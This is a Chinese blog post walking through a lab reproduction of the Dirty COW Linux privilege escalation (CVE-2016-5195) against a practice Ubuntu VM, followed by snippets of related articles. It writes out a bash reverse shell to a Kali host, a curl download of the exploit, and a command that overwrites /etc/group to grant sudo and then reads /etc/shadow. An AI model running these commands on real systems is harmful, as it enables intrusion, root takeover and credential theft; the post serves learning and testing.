Linux提权之脏牛Dirty COW CVE-2016-5195 (四)

于 2025-02-22 20:28:47 发布
阅读量539 收藏 7
点赞数 9
分类专栏: Linux提权完整版 文章标签: 安全 测试工具 linux 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/145800354
版权

CVE-2016-5195(Dirty Cow脏牛)

脏牛提权的利用方式不同于其他的内核溢出提权,这里单独记录

脏牛是一个非常经典的内核提权漏洞,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复

Dirty COW漏洞原理与简单利用_dirtycow-CSDN博客

首先我们下载环境

我们的kail ip 192.168.25.138

Ubuntu ip 192.168.25.135

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: kru8

--来自百度网盘超级会员v3的分享

首先访问192.168.25.135

打开

eval函数

我们还是打开kail的反弹

system('bash -c "bash -i >& /dev/tcp/192.168.25.138/8888 0>&1"');

已经反弹回来了

还是一样的 修改为完整的tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

我们在Ubuntu 新建普通用户

在kail反弹shell中查看

然后我们下载exp

DirtyCow(脏牛)漏洞复现 | Brucetg's Blog

首先

git clone https://github.com/dirtycow/dirtycow.github.io

然后打开http服务

python3 -m http.server 80

curl http://192.168.25.138/dirtyc0w.c -o /tmp/dirtyc0w.c

然后编译 增加权限

gcc -pthread dirtycow.c -o dirtycow

然后返回Ubuntu主机查看权限

然后输入

把用户加到sudo数组里 root

./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,hjl/' /etc/group)"

查看权限

发现多了sudo 权限

用普通用户的密码 拿下root

看到root 跟 hjl 权限一样了

我们输入cat /etc/shadow

权限不够 sudo来凑

还是可以访问的

我们脏牛 就复现成功了

【漏洞复现】CVE-2016-5195 DirtyCow
李火火的安全圈
03-10 8779
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
DirtycowCVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 758
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
Linux权漏洞复现(CVE-2016-5195
小千安全
05-06 877
漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
权复现CVE-2016-5195
kwame211的博客
05-21 6274
Linux官方爆出了“”漏洞(代号:Dirty COW,编号:CVE-2016-5195),攻击者可利用该漏洞本地以低权限升到root权限。该漏洞又称为 Dirty COWDirty COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞的特别之处在于,防病毒和安全软件无法检测,一旦被利用,用户根本无从知晓。 为避免服务器受影响,请尽快检查其上的内核版本是否受影响,并及时关...
Linux内核通杀权漏洞CVE-2016-5195验证
2301_77512689的博客
04-14 475
2. 改漏洞允许攻击者使用本地账户修改磁盘上的二进制文件,绕过标准权限的限制,这些权限机制通常用于防止修改没有适当的权限集。CVE-2016-5195这个漏洞是linux内核级的本地权漏洞,原理是linux内核内存子系统在。文件权限也没出错,漏洞执行的过程中没有任何错误但是就是无法写入内容到指定文件中,原因可能是。1. 没有权限的本地用户可以使用此漏洞获取写访问权限,修改制度内存映射,从而权。有些发行版系统的内核可能在受影响范围内,但是使用上述poc的时候,编译也没出错,
深度分析“大小”漏洞:CVE-2016-5195CVE-2017-1000405
VN520的博客
08-18 1158
漏洞(CVE-20165195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,漏洞的修复补丁仍存在缺陷,由此产生了“大”漏洞。
漏洞影响的linux内核,CVE-2016-5195 漏洞:Linux内核通杀权漏洞验证 | 聂扬帆博客...
weixin_33433067的博客
04-30 559
一、漏洞简介漏洞编号:CVE-2016-5195漏洞名称:(Dirty COW)漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地权影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响二、漏洞影响1. 没有权限的本地...
DirtyCow权漏洞复现(CVE-2016-5195)1
08-08
Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
Linux权漏洞 CVE-2016-5195 Vulnhub靶场
weixin_62591194的博客
07-08 766
【漏洞复现】Linux权(CVE-2016-5195 vulnhub)
Linux内核通杀权漏洞(CVE-2016-5195漏洞), 临时解决办法
wwwwestcn的博客
03-21 888
经过核实测试,西部数码云主机centos 7系统受次漏洞影响(centos6并不受影响),特此发布漏洞解办法。之前Linux官方爆出了""漏洞(代号:Dirty COW,漏洞编号:CVE-2016-5195),echo "/usr/bin/staprun -L 文件路径" >> /etc/rc.local。/usr/bin/staprun -L 文件路径。2. 如果您的主机内核是此版本,请执行以下操作。1. 登录服务器,查看内核版本。3. 非此本内核,请手动编译。返回信息如下,说明补丁成功。
Lampiao (CVE-2016-5195)
m0_64118193的博客
08-30 904
漏洞编号漏洞名称:权漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地权,获取root权限影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复链接:靶场下载地址,取码链接:权文件下载地址,权码zp3j。...
Linux(CVE-2016-5195)权保姆级教程
weixin_68408599的博客
08-17 6413
CVE-2016-5159权的保姆级的教程
CVE-2016-5195()
最新发布
jiangzhen5566的博客
01-21 283
该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。常规是生成firefart用户,可以更改dirty.c文件来设置用户,这里为了方便修改为了root。执行完毕之后,查看/etc/passwd。./dirty 123456(密码)上传dirty.c执行。su 用户名 输入密码。
悬镜安全实验室丨DirtyCow Linux权限升漏洞分析(CVE-2016-5195
Anprou的博客
11-14 1636
悬镜安全实验室原创文章,如需转载,请联系小编。首发平台:悬镜官网。
Linux(CVE-2016-5195)Dirty cow漏洞利用
m0_73927535的博客
06-04 883
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
Linux本地权漏洞(CVE-2016-5195)
07-24 2万+
漏洞编号:CVE-2016-5195漏洞名称:Dirty COW)漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地权影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 一、检查内核版本 通过uname -a 命令,查看内核版本: 主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版...
Linux权—漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 漏洞 exp1复现: exp2复现: 漏洞 漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
漏洞(CVE-2016-5195)复现过程(详细完整版)
qq_40898302的博客
01-19 3247
KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握漏洞的原理高对内核安全性的认识。
Dirty COW(CVE-2016-5195)
06-07
Dirty COW)是一种Linux内核漏洞,漏洞编号为CVE-2016-5195。攻击者可以利用该漏洞获取系统管理员权限,进而控制整个系统。 Dirty COW漏洞源于Linux内核对Copy-On-Write(COW)机制的实现不当。攻击者可以通过修改系统中的共享库,以此触发内核中的缺陷,从而突破Linux系统的安全机制。 Dirty COW漏洞被发现后,Linux社区及时发布了修复补丁,建议用户及时更新系统。同时,用户还可以通过以下措施来防范漏洞的攻击: 1. 安装最新的系统补丁,包括内核和共享库等。 2. 禁用SUID/SGID权限,即不允许普通用户以超级用户身份运行某些程序。 3. 避免在生产环境下使用过时的、未经验证的软件程序。 4. 控制系统对外开放的端口和服务,尽可能减少攻击面。 5. 定期进行安全审计和漏洞扫描,及时发现和修复安全漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值